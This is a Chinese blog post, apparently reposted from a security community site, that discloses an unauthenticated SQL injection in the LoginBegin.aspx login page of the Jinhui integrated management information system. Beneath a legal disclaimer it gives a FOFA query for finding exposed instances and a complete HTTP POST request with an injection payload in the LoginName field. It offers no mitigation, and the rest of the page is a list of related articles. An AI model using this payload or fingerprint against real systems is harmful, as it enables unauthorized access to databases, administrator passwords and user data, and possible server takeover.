漏洞披露-金慧-综合管理信息系统-SQL

于 2024-08-27 16:09:26 发布
阅读量180 收藏 3
点赞数 6
分类专栏: 漏洞复现~ 文章标签: sql 数据库 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuwenshequ/article/details/141605469
版权

本文来自无问社区,更多漏洞信息可前往查看icon-default.png?t=N7T8http://wwlib.cn/index.php/artread/artid/6607.html

本文仅用于技术研究学习,请遵守相关法律,禁止使用本文所提及的相关技术开展非法攻击行为,由于传播、利用本文所提供的信息而造成任何不良后果及损失,与本账号及作者无关。

0x01 产品简介

金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。

0x02 漏洞概述

由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

图片

0x03 复现环境

FOFA:body="/Portal/LoginBegin.aspx"

0x04 漏洞复现

payload:

POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
 
Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=

效果图:
 

图片

无问社区
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
金慧-综合管理信息系统 LoginBegin.aspx SQL注入漏洞复现
0xSec
07-26 506
由于金慧-综合管理信息系统LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现」金慧-综合管理信息系统 LoginBegin.aspx SQL注入漏洞
qq_39894062的博客
07-31 315
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
视频教程-2020年上半年 软考 系统分析师 综合知识真题讲解-软考
weixin_34238679的博客
05-28 577
2020年上半年 软考 系统分析师 综合知识真题讲解 系统架构设计师、系统分...
视频教程-2020年下半年 软考 系统架构设计师 综合知识真题讲解-软考
weixin_33567765的博客
05-28 1104
2020年下半年 软考 系统架构设计师 综合知识真题讲解 系统架构设计师、系...
上海金慧软件有限公司市场经营管理系统
08-18
上海金慧软件有限公司推出的市场经营管理系统是一款专为企业经营管理部门设计的综合性管理工具。该系统旨在通过高效的信息管理和数据分析,帮助企业提高运营效率,优化财务管理流程,增强客户关系管理能力。系统的...
上海金慧软件工程项目管理系统.pdf
09-26
上海金慧软件工程项目管理系统是一款专为工程建设全生命周期管理设计的企业级解决方案。系统通过集成多种技术和应用功能,构建了一个全面的信息化平台,旨在实现从项目投资分析、立项到竣工交付的全程生产管理。其...
信息化提升-附件1-2015年度省工业和信息产业转型升级专项资金项目指南.pdf
11-21
这些项目旨在提高企业的信用管理水平,完善信用信息系统,促进诚信环境的构建,以及提高信用信息的利用和监管效率。 2. **信息化引领类项目**: - **软件和云计算项目**:关注核心技术突破,公共服务平台建设,...
SQL】关注者数量
Frost_Descent的博客
08-23 522
(user_id, follower_id) 是这个表的主键(具有唯一值的列的组合)。count计数,count(follower_id) followers_count。该表包含一个关注关系中关注者和用户的编号,其中关注者关注用户。使用order by升序排列order by user_id。编写解决方案,对于每一个用户,返回该用户的关注者数量。按照用户id分组,group by user_id。查询结果的格式如下示例所示。2 的关注者有 {0,1}0 的关注者有 {1}1 的关注者有 {0}
数据库查询大量数据避免内存溢出的方法
huan1213858的博客
08-23 212
每次查询一定数量数据之后记录id,进行数据处理之后再继续查询继续处理,
出现Property ‘sqlSessionFactory‘ or ‘sqlSessionTemplate‘ are requiredProperty报错
m0_74436895的博客
08-23 704
SpringBootApplication,它组合了@Configuration, @EnableAutoConfiguration, 和 @ComponentScan注解的功能。我在使用一个验证码生成的工具asy-captcha库的验证码接口遇到javax.script.ScriptEngine.eval调用失败的问题,因为engine为null。1.启动类 里配置的 (@MapperScan(“com.example.demo.dao.mapper”)),这里开始配置错了。n若有添加,尝试删除。
Hive SQL
最新发布
08-26 748
tinyint 1byte 有符号整数smallint 2byte 有符号整数int 4byte 有符号整数bigint 8byte 有符号整数boolean 布尔类型,true或者falsefloat 单精度浮点数double 双精度浮点数decimal 十进制精准数字类型 decimal(16,2)
SQL进阶技巧:如何按任意时段分析时间区间问题? | 分区间讨论【左、中、右】
石榴姐yyds
08-23 97
本文分析了一种按任意时段计算时间区间问题的方法和思路,其本质是区间重叠问题的应用,文中给出了两种方法,一种按照区间重叠的方式进行分情况讨论划分区间,找出重叠区间,并计算问题,一种按照区间展开的形式形成全量的明细表,基于明细表求解任意给定的时段统计问题
推荐一篇 学习SQL 的文章
m0_66975650的博客
08-26 294
学习 java,当然避不开数据库的知识,个人认为好学好理解的一篇文章,推荐给大家
PostgreSQL如何设置主键自增(序列、SERIAL)
西京刀客
08-26 621
在使用Mysql时,创建表结构时可以通过关键字auto_increment来指定主键是否自增。但在Postgresql数据库中,虽然可以实现字段的自增,但从本质上来说却并不支持Mysql那样的自增。
SQL基础】【leetcode】SQL50题
FQY__的博客
08-26 797
里的,就可以得到只光顾商店的客人。进行分组,这是因为如果不这样使用,聚合函数返回的结果是一个值,需要用分组进行分开。可以把原始的表分为start表和end表,再进行联表查询,这样就可以计算时间戳的插值,进而使用。)的情况查询出的内容是笛卡儿积,而WHERE的限制条件则是对其的筛选。或者我写的这种隐式链接。是一个用于计算两个日期之间差异的函数,它返回两个日期之间的差异,以天数为单位。这一题的本质就是将两个表合并,得到所需的信息,因此不需要额外的操作了。注意,联表查询得到的结果是一张临时表,而最基础的。
SQL 对版本进行排序遇到的问题
qq_40603125的博客
08-26 108
物料存在多喝版本,我们每次只需要使用最新的版本。
[mysql][sql]mysql查询表大小
一名不太专业的程序员
08-21 513
表中选择特定数据库(在这个例子中是名为 'crawleroocllisten' 的数据库)的表信息。查询结果包括数据库名、表名、表中的记录数以及数据和索引所占用的空间容量(单位为MB)。这个查询通常用于数据库管理,帮助管理员了解数据库中各个表的大小和记录数,以便进行优化和维护。函数来将数据和索引长度除以1024两次(将字节转换为MB),并且保留两位小数。SQL 查询语句,用于从。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值